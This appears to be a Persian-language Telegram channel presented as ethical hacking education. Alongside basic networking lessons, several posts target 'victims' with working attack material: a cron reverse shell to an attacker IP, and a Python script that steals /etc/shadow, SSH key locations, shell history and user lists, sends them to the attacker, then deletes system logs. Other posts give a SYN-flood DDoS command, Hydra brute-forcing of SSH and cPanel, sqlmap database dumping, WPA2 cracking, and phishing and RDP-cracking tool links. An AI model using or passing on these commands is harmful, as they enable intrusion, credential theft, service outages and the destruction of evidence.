DarkPacket
6.93K subscribers
25 photos
2 videos
23 files
48 links
> 🛡️ Ethical Hacking | Cyber Security

💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
📡 Nmap: قدرتمندترین ابزار اسکن شبکه

نصب: sudo apt install nmap

کاربردی‌ترین کامندها:
🔹 sudo nmap -sS 192.168.1.0/24 → SYN Scan سریع
🔹 sudo nmap -sV 192.168.1.10 → تشخیص سرویس و ورژن
🔹 sudo nmap -O 192.168.1.10 → تشخیص سیستم‌عامل
🔹 sudo nmap -sC -sV -p- 192.168.1.10 → اسکن کامل

🎯 -sC اسکریپت‌های پیش‌فرض را اجرا می‌کند (یافتن آسیب‌پذیری)
#کاربردی #Nmap
15
🔄 TCP: اتصال‌گرا، مطمئن، آهسته (HTTP, SSH, FTP)
UDP: بی‌اتصال، سریع، بدون تضمین (DNS, DHCP, VoIP)

🔍 در TCP: Handshake سه مرحله‌ای (SYN → SYN-ACK → ACK)
در اسکن SYN، بدون تکمیل Handshake پورت‌ها را کشف می‌کنیم.

🎯 پورت‌های UDP معمولاً در اسکن جا می‌افتند — حتماً جداگانه اسکن کنید.
#آموزشی #TCP #UDP
2
آشنایی با IP Address و CIDR

🌐 IPv4 = ۳۲ بیت → ۴ بخش ۸ بیتی (مثال: 192.168.1.10)
🌐 IPv6 = ۱۲۸ بیت → هنوز در ایران کمتر استفاده می‌شود

📐 CIDR Notation:
192.168.1.0/24 → subnet mask 255.255.255.0 → ۲۵۶ آدرس
192.168.0.0/16 → ۶۵۵۳۶ آدرس
10.0.0.0/8 → ۱۶ میلیون آدرس

🎯 در پنتس: برای محدوده هدف، از CIDR استفاده کنید:
nmap -sn 192.168.1.0/24
#آموزشی #IP #CIDR
191
ARP Protocol چیست؟

🔗 ARP (Address Resolution Protocol):
تبدیل IP به MAC Address

سناریو: کامپیوتر A می‌خواهد با 192.168.1.20 ارتباط بگیرد
1️⃣ ARP Request: "کی مالک IP 192.168.1.20 است؟"
2️⃣ ARP Reply: "من هستم، MAC من aa:bb:cc:dd:ee:ff است"

🔥 حمله ARP Spoofing: هکر پاسخ جعلی می‌دهد → ترافیک به ماشین هکر هدایت می‌شود

🛡️ راهکار: ARP Inspection در سوئیچ‌های مدیریتی
#آموزشی #ARP
18🔥1
Fishlocaltest.py
5.1 KB
Pydroid 3 رو نصب کن
پکیج Flask رو نصب کن:
دکمه ☰ (منو) → Pip → توی کادر بنویس flask → Install
کد بالا رو کامل کپی کن و توی یه فایل جدید پیست کن (مثلاً phish.py)
دکمه (Run) رو بزن
نتیجه: یه صفحه لاگین شبیه سایت‌های واقعی باز میشه. هر چی توش بنویسی، توی فایل credentials.txt ذخیره میشه و همون لحظه توی ترمینال نشون داده میشه
صرفا این برای کسایی که نمیدونن صفحه جعلی(فیشینگ) چیه برای همین میتونن با این ابزار این رو درک کنین

یک اسکریپت خوب هم برای فیشینگ میدم
امیدوارم تو راه درست استفاده کنین
211👍1
https://github.com/htr-tech/zphisher/tree/master?search=1
افراد مبتدی میتونن از زد فیشر برای فیشینگ استفاده کنن
کامل آموزش نصب رو داخل گیت هاب گذاشته هم برای گوشی هم برای کالی
212
آموزش SQL Injection اتوماتیک با SQLmap

نصب: apt install sqlmap

اگه رو یوزر روت su نیستید sudo بزنید اول کد نصب، اینا آسونه نیازی به گفتن نیست گفتم شاید مبتدی داخل باشه. 🌷

🔹 تشخیص و استخراج دیتابیس:

sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables
sqlmap -u "http://target.com/page.php?id=1" -D dbname -T users --dump

این ابزار عالیه خودش آسیب‌پذیری را پیدا و بهره‌برداری می‌کند.

#SQLmap #SQLInjection #آموزشی #ℳℴ𝒷𝒾𝓃
172🔥2
هک وای‌فای (WPA2) با aircrack-ng

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo airodump-ng -c 6 --bssid TARGET_MAC -w capture wlan0mon
sudo aireplay-ng -0 5 -a TARGET_MAC wlan0mon
sudo aircrack-ng -w wordlist.txt capture-01.cap


نکته تکمیلی: فقط wordlist.txt یادتون نره رو وای‌فای همسایه هم تست نکنید. 😂

#aircrack_ng #WPA2 #آموزشی #ℳℴ𝒷𝒾𝓃
16🔥21
https://github.com/mrnullhack/RDP_CRACK

گفتم بی انصافی میکنم تو حق کرکر های عزیز
اینم ی ابزار خوب و خفن برای شما
آموزش استفاده کامل توی گیت هاب داده شده حتما بعد استفاده نظر خودتون رو با ما در اشتراک بزارید
19🔥2👎1
استخراج کامل دیتابیس SQL با یک خط:
sqlmap -u "http://target.com/?id=1" --dbs --batch --dump-all

فقط URL آسیب‌پذیر رو بذار و خودش همه چی رو میکشه بیرون.

#sqlmap #آموزشی #ℳℴ𝒷𝒾𝓃
202🔥2
حمله DDoS با hping3
hping3 -S --flood -p 80 target.com

پورت 80 سایت رو با SYN Flood نابود میکنه

#hping3_DDoS #آموزشی #ℳℴ𝒷𝒾𝓃
193🔥2
بک‌دور دائمی تو سیستم قربانی است:
حتما باید رو سیستم خودتون شنود زده باشید مثل کد زیر
nc -lvnp 5555

بعد سیستم اون بدبخت هم اینو اجرا کنید:
echo "0 */1 * * * bash -i >& /dev/tcp/123.456.7.8/5555 0>&1" >> /etc/crontab

حالا چی میشه؟
یه cron job به سیستم قربانی اضافه می‌کنه که هر ۱ ساعت، یه شل معکوس به سیستم تو می‌فرسته و رو ترمینال میاد که حتی اگه سیستم ری‌استارت بشه، این کار باقی می‌ماند.

اگه می‌خواید زودتر از ۱ ساعت شل بگیرید، این رو اجرا کنید:
(crontab -l; echo "* * * * * bash -i >& /dev/tcp/123.456.7.8/5555 0>&1") | crontab -

این یعنی هر دقیقه شل می‌فرسته

#SHELL #آموزشی #ℳℴ𝒷𝒾𝓃
181👍1🔥1
اصول اطلاعات‌جمعی (Reconnaissance) 🔹

🎯 ۶۰٪ موفقیت در پنتست به اطلاعات‌جمعی بستگی دارد!

دو نوع:
🟢 Passive Reconnaissance (بدون تماس مستقیم)
- Google Dorking
- Whois lookup
- LinkedIn/Shodan

🔴 Active Reconnaissance (تماس مستقیم با هدف)
- Nmap scan
- DNS enumeration
- Directory fuzzing

قانون طلایی: اول Passive، بعد Active!
#آموزشی #Reconnaissance
Please open Telegram to view this post
VIEW IN TELEGRAM
172🔥1
DarkPacket
برای عضویت پیام بدین @net_activenull
دوره کاملا از دیشب پر شده ممنون میشم تا دوره های بعدی صبر کنین اصلا جا نیست ممنون
16🔥3
کد شل معکوس بد گرفتن شل:

چیکار می‌کنه این کد؟
همه اطلاعات حیاتی مثل هش پسورد، کلید SSH، تاریخچه فرمان‌ها، کاربران، کرون‌جاب ها براتون میاد بعدش خودش همه لاگ‌ها رو پاک می‌کنه. هیچ ردی نمی‌مونه.

خوب حالا چطوریه؟
اول باید یه شنود اوکی کنید رو سیستم:

nc -lvnp 4444

تموم حالا این اسکریپت رو روی سیستم اون بدبخت بزن:

#!/usr/bin/env python3
# Silent Killer - Post-Exploitation Script
# بعد از گرفتن شل، اینو اجرا کن

import os
import subprocess
import socket
import time

ATTACKER_IP = "192.168.1.5"
ATTACKER_PORT = 4444

def exfiltrate(data):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ATTACKER_IP, ATTACKER_PORT))
sock.send(data.encode())
sock.close()
except:
pass

def grab_all():
# ۱. استخراج همه هش‌های پسورد
hashes = subprocess.check_output("cat /etc/shadow 2>/dev/null || echo 'no shadow'", shell=True)
exfiltrate(f"[SHADOW]\n{hashes.decode()}")

# ۲. استخراج کلیدهای SSH
ssh_keys = subprocess.check_output("find / -name 'id_rsa' -o -name 'id_dsa' 2>/dev/null | head -20", shell=True)
exfiltrate(f"[SSH_KEYS]\n{ssh_keys.decode()}")

# ۳. استخراج تاریخچه شل
history = subprocess.check_output("cat ~/.bash_history 2>/dev/null || echo 'no history'", shell=True)
exfiltrate(f"[HISTORY]\n{history.decode()}")

# ۴. استخراج اطلاعات شبکه
network = subprocess.check_output("ifconfig 2>/dev/null || ip addr 2>/dev/null", shell=True)
exfiltrate(f"[NETWORK]\n{network.decode()}")

# ۵. استخراج کاربران
users = subprocess.check_output("cat /etc/passwd 2>/dev/null | grep '/bin/bash'", shell=True)
exfiltrate(f"[USERS]\n{users.decode()}")

# ۶. استخراج کرون‌جاب‌ها
crons = subprocess.check_output("cat /etc/crontab 2>/dev/null; crontab -l 2>/dev/null", shell=True)
exfiltrate(f"[CRONS]\n{crons.decode()}")

def wipe_logs():
# پاک کردن ردپا
subprocess.call("rm -rf /var/log/* 2>/dev/null", shell=True)
subprocess.call("history -c 2>/dev/null", shell=True)
subprocess.call("unset HISTFILE 2>/dev/null", shell=True)
subprocess.call("rm -f ~/.bash_history 2>/dev/null", shell=True)
exfiltrate("[+] Logs wiped")

if __name__ == "__main__":
grab_all()
wipe_logs()
exfiltrate("[+] DONE - All data extracted")

فقط آی‌پی خودتون رو یادتون باشه ویرایش کنید و بزنید.

همین دیگه تمام چیز خاصی نداره. 🌷

#SHELL #آموزشی #ℳℴ𝒷𝒾𝓃
🔥41
حمله به سرور SSH با Hydra (کرک پسورد)

hydra -l root -P rockyou.txt ssh://target.com

-l root یوزرنیم هدف
-P rockyou.txt لیست پسورد

بعد از چند دقیقه اگر ضعیف باشه پسوردش درمیاد البته به پسوردلیست شما و تارگت بستگی داره، مثلا تارگت روسی سعی کنید پسورد لیست روسی هم تست کنید و...

پسورد لیست دارید؟ با ری‌اکشن [👍/👎] بگید 🌷

#SSH #Hydra #آموزشی #ℳℴ𝒷𝒾𝓃
17👎5👍3
DarkPacket
حمله به سرور SSH با Hydra (کرک پسورد) hydra -l root -P rockyou.txt ssh://target.com -l root یوزرنیم هدف -P rockyou.txt لیست پسورد بعد از چند دقیقه اگر ضعیف باشه پسوردش درمیاد البته به پسوردلیست شما و تارگت بستگی داره، مثلا تارگت روسی سعی کنید پسورد لیست…
حمله به CPanel هم مثل قبلی هست:

hydra -l admin -P rockyou.txt target.com http-post-form "/login/:user=^USER^&pass=^PASS^:F=incorrect"

فقط:

فرم لاگین cPanel رو هدف بگیر
پسوردش درمیاد و کل هاست دستته

مثل قبلی پسورد لیست میخواد.

#cPanel #آموزشی #ℳℴ𝒷𝒾𝓃
16🔥3
اسکن آسیب‌پذیری کامل سرور

nmap -sV -sC -p- --script=vuln target.com

همه پورت‌ها رو اسکن میکنه و آسیب‌پذیری‌های شناخته‌شده رو نشون میده و اگه سرور قدیمی باشه، اکسپلویتش رو پیدا میکنی...

#nmap #آموزشی #ℳℴ𝒷𝒾𝓃
18🔥3
DarkPacket
اسکن آسیب‌پذیری کامل سرور nmap -sV -sC -p- --script=vuln target.com همه پورت‌ها رو اسکن میکنه و آسیب‌پذیری‌های شناخته‌شده رو نشون میده و اگه سرور قدیمی باشه، اکسپلویتش رو پیدا میکنی... #nmap #آموزشی #ℳℴ𝒷𝒾𝓃
فقط بزنید کد اسکنر گاد زیر رو... 🗿
یه نسخه عالی از کد بالا است.

t=target.com; sudo nmap -sS -sV -sC -O -A -p- -T4 --min-rate=10000 --script="vuln,auth,default,discovery,exploit,brute,broadcast,dos" --script-timeout=60s --open --reason -oN /tmp/god_scan_$t.txt $t 2>/dev/null; echo "[+] OPEN PORTS:"; grep "open" /tmp/god_scan_$t.txt; echo; echo "[+] VULNERABILITIES:"; grep -iE "vulnerable|cve-|exploit|brute|weak|auth|bypass|backdoor|default password" /tmp/god_scan_$t.txt; echo; echo "[+] OS DETECTION:"; grep -iE "os:|running:|aggressive|device type" /tmp/god_scan_$t.txt; echo; echo "[+] FULL REPORT SAVED: /tmp/god_scan_$t.txt"


فقط کافیه target.com رو عوض کنی و کل خط رو بزنی تو ترمینال...

همه پورت‌های باز پورت‌های باز
آسیب‌پذیری‌ها (CVE ها، بک‌دورها، پسورد پیش‌فرض)
سیستم‌عامل، دقیق با نسخه
با گزارش کامل

#nmap #آموزشی #ℳℴ𝒷𝒾𝓃
152🔥2
Google Dorking حرفه‌ای

🔍 Google Dorking: گوگل مثل یک اسکنر آسیب‌پذیری!

دستورات کاربردی:
site:target.com filetype:pdf
site:target.com intitle:"index of"
inurl:wp-admin
intitle:"phpMyAdmin" inurl:main.php
filetype:sql "INSERT INTO" "password"
inurl:.git/config
site:*.target.com -www

🔴 هشدار: اطلاعات لو رفته زیادی پیدا می‌شود:
"confidential" site:target.com

🎯 مرجع کامل: www.exploit-db.com/google-hacking-database
#آموزشی #GoogleDorking
Please open Telegram to view this post
VIEW IN TELEGRAM
171🔥1